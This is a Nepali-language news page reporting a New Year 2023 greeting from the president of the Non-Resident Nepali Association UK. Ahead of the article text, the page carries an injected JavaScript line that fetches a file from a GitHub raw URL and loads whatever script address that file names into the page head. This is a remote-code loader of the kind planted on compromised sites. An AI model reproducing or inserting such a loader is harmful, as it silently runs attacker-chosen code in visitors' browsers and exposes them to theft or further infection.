;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); अंग्रेजी नयाँ बर्ष २०२३ को यसरी शुभकामना दिए एनआरएन अध्यक्ष खडकाले – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • अंग्रेजी नयाँ बर्ष २०२३ को यसरी शुभकामना दिए एनआरएन अध्यक्ष खडकाले
Breaking News

अंग्रेजी नयाँ बर्ष २०२३ को यसरी शुभकामना दिए एनआरएन अध्यक्ष खडकाले

जुनेली न्युज, बेलायत |

गैर आबासिय नेपाली संघ बेलायतका अध्यक्ष सुनिल बावु खडकाले नवबर्ष २०२३ को शुभकामना प्रदान गरेका छन।

गैर आबासिय नेपाली संघ बेलायतका प्रवक्ता शशांक शर्माका अनुसार बेलायत बासी नेपालीहरु, समस्त गैर आबासिय नेपाली संघ बेलायतका सदस्यहरु लगायत गैर आबासिय नेपालीहरुलाई सम्बोधन गरिएको शुभकामना सन्देसमा अध्यक्ष खडकाले नयाँ बर्ष २०२३ मा सबैको खुसी,सुस्वास्थे र उत्तरउत्तोर प्रगतीको कामना गर्नु भएको छ।

शुभकामना सन्देसमा अध्यक्ष खडकाले गैर आबासिय नेपाली संघ बेलायतमा यसको स्थापना बाटै बिभीन्न उतारचढाव भई राखेको र यस्ता उतार चढावहरुलाई गैर आबासिय नेपाली संघ बेलायतका अभियन्ताहरु लगायत समय समयको नेतृत्वले सही ढंगले सम्बोधन गर्न सफल भैराखेको छ।

गैर आबासिय नेपाली संघ बेलायतको यो इतिहासलाई मेरो नेतृत्वमा रहेको कार्यसमितिले पनी अगाडी बढाउने कुरामा आफु विस्वस्त रहेको र यस कार्यमा आफु लाई सहयोग गर्न सबै बेलायत बासी नेपालीहरु लगायत संघको अन्तराष्ट्रिय नेतृत्व लाई समेत अनुरोध गर्नु भएको छ।

फेसबुक प्रतिक्रियाहरु